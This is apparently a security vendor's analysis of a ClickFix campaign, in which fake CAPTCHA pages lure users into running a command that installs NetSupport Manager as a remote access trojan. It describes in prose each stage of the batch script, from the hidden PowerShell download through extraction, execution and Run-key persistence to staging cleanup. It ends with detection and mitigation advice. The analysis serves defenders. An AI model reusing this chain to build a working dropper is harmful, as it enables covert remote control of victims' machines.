NetSupport, Courtesy of Your Clipboard

The ongoing ClickFix campaign continues to evolve, as threat actors are adopting additional delivery methods designed to bypass traditional defenses through user interaction. While the broader campaign has been previously analyzed, the latest tactics observed demonstrate a continued emphasis on abusing native tools and social engineering. 

This campaign has been known to direct users to pages that mimic CAPTCHA verifications. These pages are visually convincing, using modern styling frameworks to establish trust. Once engaged, the user is prompted to execute a pre-populated command via the Windows Run dialog, a technique that leverages clipboard manipulation or on-screen instructions to initiate execution. 

The most recent variation seen in the wild by the Blackpoint SOC ultimately leads to victims unknowingly being tricked into installing NetSupport Manager as a Remote Access Trojan (RAT). The final payload is staged and persisted on disk using native utilities, allowing adversaries full remote access with minimal friction. 

Image 1: Process tree of the ClickFix execution. 

Dissecting the Execution Chain 

Victims are directed to a legitimate website that has been compromised and is hosting malicious JavaScript. This JavaScript renders a fake CAPTCHA prompt, instructing the user to press Win + R and paste a command into the Windows Run dialog box.  

Image 2: Initial one-liner command execution. 

Once that command is executed, it downloads and executes a malicious batch script. Let’s break it down further: 

1. Execution Setup and Handling 

The script begins by suppressing command output to reduce visibility during execution and enables delayed variable expansion to allow dynamic evaluation of variables throughout the script, which is particularly useful in conditional logic and loops.              

Image 3: Suppressing command output and enabling delayed variable expansion. 

2. Variable Initialization 

With the initial setup complete, the script creates four key variables: 

• The second stage URL to download a ZIP archive containing the RAT payload. 

• The target path to save this ZIP archive within the user’s AppData directory. 

• The extraction path for the ZIP archive 

• The full path of the final payload (client32.exe).

Image 4: Defining variables for remote URL, staging and extraction directories, and full path of final payload. 

3. Directory Setup  

A check is performed to ensure the defined extraction directory exists. If it does not, the script creates it using mkdir. This is the destination directory for the contents of the ZIP archive.

Image 5: Checking for the defined extraction directory and creating one if it doesn’t exist. 

4. Second Stage ZIP Archive  

Using PowerShell, the script fetches the ZIP archive from the attacker-controlled domain and stores it in the defined staging directory as Application.zip. Notably, this method leverages Invoke-WebRequest with the -WindowStyle Hidden flag to suppress any user-visible UI. 

Image 6: Using PowerShell’s Invoke-WebRequest to retrieve ZIP from second stage domain. 

5. Payload Extraction 

The downloaded ZIP archive is extracted using PowerShell’s System.IO.Compression.ZipFile .NET class. The payload is unpacked into the previously created Options directory under the user’s AppData folder

Image 7: Using PowerShell’s System.IO.Compression.ZipFile .NET class to extract the ZIP archive 

6. Payload Execution  

Immediately after extraction, the script launches client32.exe, which is a NetSupport Manager binary, via the start command.

Image 8: Executing the freshly extracted NetSupport Manager binary. 

7. Establish Persistence 

To establish persistence, the script creates a new Current User Run registry key. A new value named Support11 is added pointing to the NetSupport binary. This causes the RAT to be launched every time the user logs in.

Image 9: Establishing persistence via a Current User Run registry key. 

8. Staging Cleanup  

Finally, the script deletes the ZIP archive used for staging. This cleanup helps reduce forensic artifacts and draw less attention post-compromise. 

Image 10: Deletion of the staging ZIP archive. 

Why it Matters 

While the tooling observed is well-known, the tactic of leveraging user-driven execution via system-native dialogs presents a unique challenge for Managed Service Providers (MSPs), as it: 

• Bypasses attachment-based detections and URL filtering. 

• Appears user-driven, reducing the likelihood of immediate flagging by EDR. 

• Abuses common administrative tooling and software that may already be permitted. 

The implications are significant for MSPs, who often rely on remote access tooling and scripting for legitimate support operations, making it difficult to distinguish malicious use from day-to-day behavior. 

Defensive Considerations 

To mitigate this technique, take the following into consideration: 

• User education on suspicious prompts to run commands to “prove you are human”. 

• Monitor telemetry for rapid chaining of native tools like cmd, curl, reg.exe, and PowerShell. 

• Flag registry autoruns from user-writable paths or non-standard executables. 

• Strict application controls or contextual allow-listing for remote management tools. 

Implementing Blackpoint’s Managed Application Control (MAC) offering can be particularly effective in this scenario. Restricting which binaries are allowed to execute can prevent unauthorized instances of NetSupport Manager and other remote access tools from launching. 

For MSPs, this is critical: a single rogue RAT can be leveraged not only to compromise a single host, but also to move laterally throughout an environment. Proactively blocking unapproved executables ensures a stronger security posture without disrupting legitimate IT operations. 

This tactic reinforces a core reality of modern threats, even known campaigns continue to evolve and adapt, and adversaries will keep finding new ways to repurpose benign features of the operating system to evade detection. Awareness and adaptive monitoring remain critical, especially for MSPs entrusted with protecting broader ecosystems.